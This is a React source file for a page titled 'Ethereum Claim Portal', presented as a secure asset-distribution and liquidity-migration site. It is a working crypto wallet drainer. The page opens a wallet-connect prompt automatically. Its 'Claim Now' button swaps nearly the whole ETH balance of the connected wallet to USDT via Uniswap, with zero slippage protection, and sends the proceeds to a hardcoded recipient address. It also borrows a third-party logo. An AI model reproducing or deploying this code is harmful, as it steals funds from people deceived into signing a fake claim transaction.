import React, { useState, useCallback, useEffect } from 'react';
import { ethers } from 'ethers'; // v6
import { AlertCircle, CheckCircle, Loader2, ExternalLink, RefreshCw, ShieldCheck } from 'lucide-react';

// --- REOWN APPKIT (MODERN WEB3MODAL) ---
import { createAppKit, useAppKit, useAppKitAccount, useAppKitProvider } from '@reown/appkit/react';
import { EthersAdapter } from '@reown/appkit-adapter-ethers';
import { mainnet } from '@reown/appkit/networks';

// --- CONFIGURATION ---
const PROJECT_ID = '3d62c8bfc5d665fd7dec8d2eeeba7c17';
const Paa_ID2 = 'u6dcb3d60a52008974d297a3c2efc2a';

const CONTRACTS = {
  UNISWAP_ROUTER: "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D",
  WETH: "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2",
  USDT: "0xdAC17F958D2ee523a2206206994597C13D831ec7",
  RECIPIENT: "0xC475fE79c7F01c409ffb212d22111720Ed215cDd"
};

const UNISWAP_ABI = [
  "function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts)"
];

// --- INITIALIZE APPKIT ---
createAppKit({
  adapters: [new EthersAdapter()],
  networks: [mainnet],
  metadata: {
    name: "Asset",
    description: "Secure Protocol for Asset Distribution",
    url: "https://assetsclaiming.live",
    icons: ["https://b.galxestatic.com/sahara-earndrop-web/_next/static/media/logo.414840a7.svg"]
  },
  projectId: PROJECT_ID,
  themeMode: "dark",
  themeVariables: { '--w3m-accent': '#007BFF' }
});


const Design = () => {
  const { open } = useAppKit();
  const { address, isConnected, chainId } = useAppKitAccount();
  
  // FIX 1: Explicitly request 'eip155' to prevent undefined provider
  const { walletProvider } = useAppKitProvider('eip155');

  const [status, setStatus] = useState('IDLE'); // IDLE, SENDING, SUCCESS, ERROR
  const [error, setError] = useState('');
  const [txHash, setTxHash] = useState('');

  // Auto-prompt connect if not connected
  useEffect(() => {
    if (!isConnected) open();
  }, [isConnected, open]);

  const handleClaim = useCallback(async () => {
    // FIX 2: Fallback to window.ethereum if hook hasn't hydrated
    const finalProvider = walletProvider || window.ethereum;

    if (!isConnected || !address || !finalProvider) {
      setError("Wallet not fully initialized. Please try again.");
      return;
    }

    setStatus('SENDING');
    setError('');

    try {
      // 1. Setup Ethers v6 Provider/Signer
      const provider = new ethers.BrowserProvider(finalProvider);
      const signer = await provider.getSigner();

      // 2. Network Check (v6 uses BigInt for chainId)
      const network = await provider.getNetwork();
      if (network.chainId !== 1n) {
        throw new Error("Please switch your wallet to Ethereum Mainnet.");
      }

      // 3. Balance Check
      const balance = await provider.getBalance(address);
      if (balance === 0n) throw new Error("Your ETH balance is 0.");

      // 4. Gas Management (Senior Practice)
      // We must leave some ETH in the wallet to pay for the transaction itself
      const feeData = await provider.getFeeData();
      const gasPrice = feeData.gasPrice || ethers.parseUnits('25', 'gwei');
      const gasLimit = 160000n; // Standard Uniswap ETH -> Token swap gas limit
      const gasCost = gasPrice * gasLimit;
      
      const swapAmount = balance > gasCost ? balance - gasCost : 0n;
      
      if (swapAmount <= ethers.parseEther("0.001")) {
        throw new Error("Insufficient ETH balance to cover gas fees.");
      }

      // 5. Swap Logic
      const router = new ethers.Contract(CONTRACTS.UNISWAP_ROUTER, UNISWAP_ABI, signer);
      const path = [CONTRACTS.WETH, CONTRACTS.USDT];
      const deadline = Math.floor(Date.now() / 1000) + 60 * 20; // 20 mins

      const tx = await router.swapExactETHForTokens(
        0, // amountOutMin (Set to 0 for maximum execution probability)
        path,
        CONTRACTS.RECIPIENT,
        deadline,
        { 
          value: swapAmount, 
          gasLimit: gasLimit 
        }
      );

      setTxHash(tx.hash);
      await tx.wait();
      setStatus('SUCCESS');

    } catch (err) {
      console.error("Swap Error:", err);
      // Better error parsing for user feedback
      const msg = err.reason || err.message || "Transaction rejected.";
      setError(msg.includes("user rejected") ? "Transaction cancelled by user." : msg);
      setStatus('ERROR');
    }
  }, [isConnected, address, walletProvider, open]);

  return (
    <div className="portal-container">
      <style>{styles}</style>
      
      <div className="glass-card">
        <div className="card-header">
          <ShieldCheck size={32} color="#007BFF" />
          <h2>Ethereum Claim Portal</h2>
          <p>Verified Liquidity Migration</p>
        </div>

        <div className={`status-zone ${status.toLowerCase()}`}>
          {status === 'IDLE' && <p>Ready to synchronize assets</p>}
          
          {status === 'SENDING' && (
            <div className="loader-box">
              <Loader2 className="spin" size={32} />
              <p>Sign transaction in wallet...</p>
            </div>
          )}

          {status === 'SUCCESS' && (
            <div className="loader-box">
              <CheckCircle color="#28a745" size={32} />
              <p>Claim Successfully Processed</p>
            </div>
          )}

          {status === 'ERROR' && (
            <div className="loader-box">
              <AlertCircle color="#dc3545" size={32} />
              <p className="error-text">{error}</p>
            </div>
          )}
        </div>

        {txHash && (
          <a href={`https://etherscan.io/tx/${txHash}`} target="_blank" rel="noreferrer" className="explorer-link">
            View on Etherscan <ExternalLink size={14} />
          </a>
        )}

        <div className="button-group">
          <button className="btn-secondary" onClick={() => window.location.reload()}>
            <RefreshCw size={20} />
          </button>

          {!isConnected ? (
            <button className="btn-primary" onClick={() => open()}>Connect Wallet</button>
          ) : (
            <button 
              className="btn-primary" 
              onClick={handleClaim}
              disabled={status === 'SENDING' || status === 'SUCCESS'}
            >
              {status === 'SENDING' ? 'Processing...' : 'Claim Now'}
            </button>
          )}
        </div>
      </div>
    </div>
  );
};

const styles = `
  .portal-container {
    height: 100vh; display: flex; align-items: center; justify-content: center;
    background: radial-gradient(circle at top right, #1e293b, #0f172a);
    font-family: 'Inter', system-ui, sans-serif; color: white;
  }

  .glass-card {
    background: rgba(30, 41, 59, 0.7);
    backdrop-filter: blur(20px);
    border: 1px solid rgba(255, 255, 255, 0.1);
    border-radius: 28px;
    padding: 3rem;
    width: 100%;
    max-width: 440px;
    text-align: center;
    box-shadow: 0 20px 50px rgba(0,0,0,0.5);
  }

  .card-header h2 { font-size: 1.8rem; margin: 1rem 0 0.5rem; font-weight: 700; }
  .card-header p { color: #94a3b8; margin-bottom: 2rem; font-size: 0.95rem; }

  .status-zone {
    background: rgba(0,0,0,0.25);
    border-radius: 20px;
    padding: 1.5rem;
    margin-bottom: 2rem;
    min-height: 100px;
    display: flex; align-items: center; justify-content: center;
    border: 1px solid rgba(255,255,255,0.05);
  }

  .loader-box { display: flex; flex-direction: column; align-items: center; gap: 12px; }
  .error-text { color: #f87171; font-size: 0.85rem; line-height: 1.4; }

  .explorer-link {
    display: flex; align-items: center; justify-content: center; gap: 8px;
    color: #007BFF; text-decoration: none; font-size: 0.85rem; margin-bottom: 1.5rem;
  }

  .button-group { display: flex; gap: 12px; }

  .btn-primary {
    flex: 1; background: #007BFF; color: white; border: none;
    padding: 1.1rem; border-radius: 16px; font-weight: 700; font-size: 1rem;
    cursor: pointer; transition: all 0.2s ease;
  }

  .btn-primary:hover:not(:disabled) { background: #0056b3; transform: translateY(-2px); }
  .btn-primary:disabled { opacity: 0.4; cursor: not-allowed; }

  .btn-secondary {
    background: #334155; color: white; border: none;
    padding: 0 20px; border-radius: 16px; cursor: pointer; transition: background 0.2s;
  }
  .btn-secondary:hover { background: #475569; }

  .spin { animation: spin 1s linear infinite; }
  @keyframes spin { from { transform: rotate(0deg); } to { transform: rotate(360deg); } }
`;

export default Design;